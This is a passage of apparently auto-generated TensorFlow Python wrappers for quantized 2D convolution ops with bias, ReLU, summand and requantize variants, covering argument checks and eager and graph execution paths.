strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasAndRelu", input=input, filter=filter,
bias=bias, min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
strides=strides, padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndReluOutput._make(_result)
return _result
QuantizedConv2DWithBiasAndRelu = tf_export("raw_ops.QuantizedConv2DWithBiasAndRelu")(_ops.to_raw_op(quantized_conv2d_with_bias_and_relu))
def quantized_conv2d_with_bias_and_relu_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasAndRelu", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndReluOutput._make(_result)
return _result
_QuantizedConv2DWithBiasAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DWithBiasAndReluAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_and_relu_and_requantize(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type=_dtypes.quint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasAndReluAndRequantize", name, input,
filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, "out_type", out_type,
"strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _QuantizedConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_and_relu_and_requantize_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, out_type=out_type,
strides=strides, padding=padding, dilations=dilations,
padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasAndReluAndRequantize", input=input,
filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "Tbias",
_op._get_attr_type("Tbias"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DWithBiasAndReluAndRequantize = tf_export("raw_ops.QuantizedConv2DWithBiasAndReluAndRequantize")(_ops.to_raw_op(quantized_conv2d_with_bias_and_relu_and_requantize))
def quantized_conv2d_with_bias_and_relu_and_requantize_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "Tbias",
_attr_Tbias, "out_type", out_type, "strides", strides, "padding", padding,
"dilations", dilations, "padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasAndReluAndRequantize",
3, inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedConv2DWithBiasAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DWithBiasAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_and_requantize(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type=_dtypes.qint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasAndRequantize", name, input, filter,
bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, "out_type", out_type,
"strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _QuantizedConv2DWithBiasAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_and_requantize_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, out_type=out_type,
strides=strides, padding=padding, dilations=dilations,
padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasAndRequantize", input=input, filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "Tbias",
_op._get_attr_type("Tbias"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DWithBiasAndRequantize = tf_export("raw_ops.QuantizedConv2DWithBiasAndRequantize")(_ops.to_raw_op(quantized_conv2d_with_bias_and_requantize))
def quantized_conv2d_with_bias_and_requantize_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "Tbias",
_attr_Tbias, "out_type", out_type, "strides", strides, "padding", padding,
"dilations", dilations, "padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasAndRequantize", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasAndRequantizeOutput._make(_result)
return _result
_QuantizedConv2DWithBiasSignedSumAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DWithBiasSignedSumAndReluAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand, strides, padding, out_type=_dtypes.quint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
summand: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_summand: A `Tensor` of type `float32`.
max_summand: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasSignedSumAndReluAndRequantize", name,
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, summand, min_summand,
max_summand, "out_type", out_type, "strides", strides, "padding",
padding, "dilations", dilations, "padding_list", padding_list)
_result = _QuantizedConv2DWithBiasSignedSumAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, summand, min_summand,
max_summand, out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasSignedSumAndReluAndRequantize", input=input,
filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
summand=summand,
min_summand=min_summand,
max_summand=max_summand,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "Tbias",
_op._get_attr_type("Tbias"), "Tsummand",
_op._get_attr_type("Tsummand"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBiasSignedSumAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSignedSumAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DWithBiasSignedSumAndReluAndRequantize = tf_export("raw_ops.QuantizedConv2DWithBiasSignedSumAndReluAndRequantize")(_ops.to_raw_op(quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize))
def quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_signed_sum_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
_attr_Tsummand, (summand,) = _execute.args_to_matching_eager([summand], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
min_summand = _ops.convert_to_tensor(min_summand, _dtypes.float32)
max_summand = _ops.convert_to_tensor(max_summand, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, summand, min_summand, max_summand]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "Tbias",
_attr_Tbias, "Tsummand", _attr_Tsummand, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBiasSignedSumAndReluAndRequantize",
3, inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBiasSignedSumAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasSignedSumAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedConv2DWithBiasSumAndReluOutput = collections.namedtuple(
"QuantizedConv2DWithBiasSumAndRelu",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_sum_and_relu(input, filter, bias, min_input, max_input, min_filter, max_filter, summand, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor` of type `float32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
summand: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasSumAndRelu", name, input, filter, bias,
min_input, max_input, min_filter, max_filter, summand, "out_type",
out_type, "strides", strides, "padding", padding, "dilations",
dilations, "padding_list", padding_list)
_result = _QuantizedConv2DWithBiasSumAndReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_sum_and_relu_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
summand, out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias_sum_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBiasSumAndRelu", input=input, filter=filter,
bias=bias, min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
summand=summand, strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
